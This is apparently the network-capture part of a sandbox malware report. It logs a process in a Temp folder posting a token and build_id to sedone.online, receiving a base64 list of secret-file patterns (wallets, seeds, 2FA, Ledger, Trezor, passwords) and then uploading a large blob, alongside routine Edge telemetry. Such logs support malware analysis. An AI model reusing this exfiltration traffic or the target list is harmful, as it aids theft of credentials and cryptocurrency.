                                                                                                                                                                                                                                                                2024-12-16 12:47:30 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 31 56 33 45 4b 36 38 47 56 33 57 34 37 51 49 57 34 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 31 56 33 45 4b 36 38 47 56 33 57 34 37 51 49 57 34 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 31 56 33 45 4b 36 38 47 56 33 57 34 37 51 49 57 34 57 54 32 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------1V3EK68GV3W47QIW4WT2Content-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------1V3EK68GV3W47QIW4WT2Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------1V3EK68GV3W47QIW4WT2Cont
                                                                                                                                                                                                                                                                2024-12-16 12:47:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:31 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:31 UTC2208INData Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                38192.168.2.849854116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:33 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----LNOZ5XL6XLN7YUAS2VAS
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 61029
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:33 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 4e 4f 5a 35 58 4c 36 58 4c 4e 37 59 55 41 53 32 56 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 4f 5a 35 58 4c 36 58 4c 4e 37 59 55 41 53 32 56 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 4f 5a 35 58 4c 36 58 4c 4e 37 59 55 41 53 32 56 41 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------LNOZ5XL6XLN7YUAS2VASContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------LNOZ5XL6XLN7YUAS2VASContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------LNOZ5XL6XLN7YUAS2VASCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:33 UTC11964OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:34 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                39192.168.2.84985520.42.73.314437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:34 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353251778&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 11575
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                2024-12-16 12:47:34 UTC11575OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 36 54 31 32 3a 34 37 3a 33 31 2e 37 37 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 31 66 35 34 32 65 39 2d 38 35 38 30 2d 34 37 64 62 2d 61 39 33 63 2d 33 34 62 31 39 63 65 31 36 33 35 35 22 2c 22 65 70 6f 63 68 22 3a 22 33 32 30 37 34 38 32 38 31 34 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-16T12:47:31.777Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"51f542e9-8580-47db-a93c-34b19ce16355","epoch":"3207482814"},"app":{"locale
                                                                                                                                                                                                                                                                2024-12-16 12:47:34 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=157d039350b946a193b3fa7f6f21bbd9&HASH=157d&LV=202412&V=4&LU=1734353254349; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 12:47:34 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                Set-Cookie: MS0=73681e32f2264ada8f0c8cec8ce868fc; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 13:17:34 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                time-delta-millis: 2571
                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:34 GMT
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                40192.168.2.84985620.42.73.314437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:34 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353251781&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 5082
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                2024-12-16 12:47:34 UTC5082OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 36 54 31 32 3a 34 37 3a 33 31 2e 37 38 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 31 66 35 34 32 65 39 2d 38 35 38 30 2d 34 37 64 62 2d 61 39 33 63 2d 33 34 62 31 39 63 65 31 36 33 35 35 22 2c 22 65 70 6f 63 68 22 3a 22 33 32 30 37 34 38 32 38 31 34 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-16T12:47:31.780Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"51f542e9-8580-47db-a93c-34b19ce16355","epoch":"3207482814"},"app":{"locale
                                                                                                                                                                                                                                                                2024-12-16 12:47:34 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=aa39e0284ab44f28bf5ece363af4f971&HASH=aa39&LV=202412&V=4&LU=1734353254717; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 12:47:34 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                Set-Cookie: MS0=33a20e6f45694da3b28293aa12d0dfcf; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 13:17:34 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                time-delta-millis: 2936
                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:34 GMT
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                41192.168.2.84985720.42.73.314437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:34 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353252627&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 5280
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                2024-12-16 12:47:34 UTC5280OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 36 54 31 32 3a 34 37 3a 33 32 2e 36 32 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 31 66 35 34 32 65 39 2d 38 35 38 30 2d 34 37 64 62 2d 61 39 33 63 2d 33 34 62 31 39 63 65 31 36 33 35 35 22 2c 22 65 70 6f 63 68 22 3a 22 33 32 30 37 34 38 32 38 31 34 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-16T12:47:32.625Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"51f542e9-8580-47db-a93c-34b19ce16355","epoch":"3207482814"},"app":{"locale
                                                                                                                                                                                                                                                                2024-12-16 12:47:35 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=04acf07082aa45e6be1af34f71d06d62&HASH=04ac&LV=202412&V=4&LU=1734353255127; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 12:47:35 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                Set-Cookie: MS0=f01260c7fbdf4a1495df13ebad87cb37; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 13:17:35 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                time-delta-millis: 2500
                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:35 GMT
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                42192.168.2.84985820.42.73.314437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:35 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353252776&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 9683
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1; msnup=
